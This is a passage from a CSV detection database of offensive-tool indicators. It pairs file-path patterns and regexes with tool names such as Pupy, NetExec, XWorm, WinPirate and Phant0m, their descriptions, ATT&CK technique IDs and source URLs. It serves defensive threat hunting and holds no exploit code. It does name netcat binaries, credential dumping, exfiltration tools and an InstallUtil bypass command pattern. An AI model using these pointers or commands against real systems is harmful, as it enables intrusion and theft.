T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*\whatlicense-main\*",".{0,1000}\\whatlicense\-main\\.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","72","6","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z" "*\WhereObjectCommand.cs",".{0,1000}\\WhereObjectCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\WheresMyImplant*",".{0,1000}\\WheresMyImplant.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*\while_dll_ms*",".{0,1000}\\while_dll_ms.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\Whisker.exe*",".{0,1000}\\Whisker\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\whoami.py*",".{0,1000}\\whoami\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\whoami_juicy.txt*",".{0,1000}\\whoami_juicy\.txt.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*\WifiKeys.dll*",".{0,1000}\\WifiKeys\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\WifiKeys.pdb*",".{0,1000}\\WifiKeys\.pdb.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\wifiPayload\client.py*",".{0,1000}\\wifiPayload\\client\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*\wifiPayload\server.py*",".{0,1000}\\wifiPayload\\server\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*\WinAudit.exe*",".{0,1000}\\WinAudit\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*\WinBruteLogon.zip*",".{0,1000}\\WinBruteLogon\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\windapsearch.py*",".{0,1000}\\windapsearch\.py.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*\WindDef_WebInstall.hta*",".{0,1000}\\WindDef_WebInstall\.hta.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\windows\all\winpwnage*",".{0,1000}\\windows\\all\\winpwnage.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*\windows\creddump*",".{0,1000}\\windows\\creddump.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*\Windows\Microsoft.NET\*\InstallUtil.exe /logfile= /LogToConsole=false /U *:\Windows\Tasks\*",".{0,1000}\\Windows\\Microsoft\.NET\\.{0,1000}\\InstallUtil\.exe\s\/logfile\=\s\/LogToConsole\=false\s\/U\s.{0,1000}\:\\Windows\\Tasks\\.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","0","N/A","8","3","202","33","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z" "*\Windows\System32\nc.exe*",".{0,1000}\\Windows\\System32\\nc\.exe.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\Windows\Tasks\a.exe*",".{0,1000}\\Windows\\Tasks\\a\.exe.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*\windows\tasks\bin.exe*",".{0,1000}\\windows\\tasks\\bin\.exe.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*\Windows\Tasks\Certipy*",".{0,1000}\\Windows\\Tasks\\Certipy.{0,1000}","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","7","602","68","2024-03-20T10:58:15Z","2023-01-31T15:37:12Z" "*\Windows\Tasks\p4yl0ad*",".{0,1000}\\Windows\\Tasks\\p4yl0ad.{0,1000}","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","0","N/A","10","2","157","22","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" "*\Windows\Temp\Bla.exe*",".{0,1000}\\Windows\\Temp\\Bla\.exe.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","0","N/A","9","5","459","94","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" "*\Windows\Temp\creds.db*",".{0,1000}\\Windows\\Temp\\creds\.db.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","10","10","525","123","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" "*\windows\temp\fakefile.exe*",".{0,1000}\\windows\\temp\\fakefile\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\Windows\Temp\Forensike*",".{0,1000}\\Windows\\Temp\\Forensike.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*\windows\temp\nc64.exe*",".{0,1000}\\windows\\temp\\nc64\.exe.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","0","N/A","10","7","633","101","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z" "*\windows\temp\ncat.exe -nv *",".{0,1000}\\windows\\temp\\ncat\.exe\s\-nv\s.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "*\windows\temp\pwned.trx*",".{0,1000}\\windows\\temp\\pwned\.trx.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*\Windows\Temp\temp.ps1*",".{0,1000}\\Windows\\Temp\\temp\.ps1.{0,1000}","offensive_tool_keyword","crackmapexec","CrackMapExec behavior","T1021 - T1048 - T1077 - T1087 - T1090 - T1135 - T1210","TA0001 - TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*\Windows\Ui\index.html*",".{0,1000}\\Windows\\Ui\\index\.html.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*\windows_x64_admin.exe*",".{0,1000}\\windows_x64_admin\.exe.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*\windows_x64_agent.exe*",".{0,1000}\\windows_x64_agent\.exe.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*\windows_x86_admin.exe*",".{0,1000}\\windows_x86_admin\.exe.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*\windows_x86_agent.exe*",".{0,1000}\\windows_x86_agent\.exe.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*\Windows-Passwords.ps1*",".{0,1000}\\Windows\-Passwords\.ps1.{0,1000}","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*\WindowsShareFinder.cs*",".{0,1000}\\WindowsShareFinder\.cs.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","675","78","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" "*\WINHELLO2hashcat.py*",".{0,1000}\\WINHELLO2hashcat\.py.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","N/A","10","1","56","3","2024-04-19T17:11:22Z","2024-03-05T00:00:20Z" "*\winPEAS.exe*",".{0,1000}\\winPEAS\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\winPEAS.sln*",".{0,1000}\\winPEAS\.sln.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*\winPEASexe\*",".{0,1000}\\winPEASexe\\.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*\WinPirate.bat*",".{0,1000}\\WinPirate\.bat.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*\WinPirate\Tools\*",".{0,1000}\\WinPirate\\Tools\\.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*\WinPirate-master*",".{0,1000}\\WinPirate\-master.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*\Win-PS2EXE*",".{0,1000}\\Win\-PS2EXE.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","0","N/A","N/A","10","1051","184","2023-12-17T09:37:50Z","2019-11-08T09:25:02Z" "*\winscp_dump.py*",".{0,1000}\\winscp_dump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\winsos.cpp*",".{0,1000}\\winsos\.cpp.{0,1000}","offensive_tool_keyword","winsos-poc","A PoC demonstrating code execution via DLL Side-Loading in WinSxS binaries.","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/thiagopeixoto/winsos-poc","1","0","N/A","10","2","103","24","2024-03-10T22:15:50Z","2024-03-10T21:35:08Z" "*\winsos.exe*",".{0,1000}\\winsos\.exe.{0,1000}","offensive_tool_keyword","winsos-poc","A PoC demonstrating code execution via DLL Side-Loading in WinSxS binaries.","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/thiagopeixoto/winsos-poc","1","0","N/A","10","2","103","24","2024-03-10T22:15:50Z","2024-03-10T21:35:08Z" "*\WiperPoc.cpp*",".{0,1000}\\WiperPoc\.cpp.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*\wireless.py*",".{0,1000}\\wireless\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\wl_log.txt*",".{0,1000}\\wl_log\.txt.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","72","6","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z" "*\wl-lic.exe*",".{0,1000}\\wl\-lic\.exe.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","72","6","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z" "*\wl-lic.pdb*",".{0,1000}\\wl\-lic\.pdb.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","72","6","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z" "*\wmi_1.dll*",".{0,1000}\\wmi_1\.dll.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","10","1725","297","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*\wmi_2.dll*",".{0,1000}\\wmi_2\.dll.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","10","1725","297","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*\wmi_exec.exe*",".{0,1000}\\wmi_exec\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\wmievasions.ps1*",".{0,1000}\\wmievasions\.ps1.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","N/A","10","2","185","22","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z" "*\wmiexec.zip*",".{0,1000}\\wmiexec\.zip.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*\WMIReg.exe*",".{0,1000}\\WMIReg\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 